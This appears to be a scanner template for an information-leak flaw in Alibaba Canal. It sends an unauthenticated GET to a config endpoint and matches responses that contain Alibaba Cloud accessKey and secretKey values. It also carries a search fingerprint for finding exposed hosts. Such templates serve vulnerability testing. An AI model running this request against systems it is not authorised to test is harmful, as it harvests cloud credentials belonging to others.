漏洞描述
app="Alibaba-Canal"
id: alibaba-canal-info-leak
info:
name: Alibaba Canal Information Leak
author: Aquilao(https://github.com/Aquilao)
severity: high
verified: true
description: app="Alibaba-Canal"
rules:
r0:
request:
method: GET
path: /api/v1/canal/config/1/1
headers:
Content-Type: application/json
expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey")
expression: r0()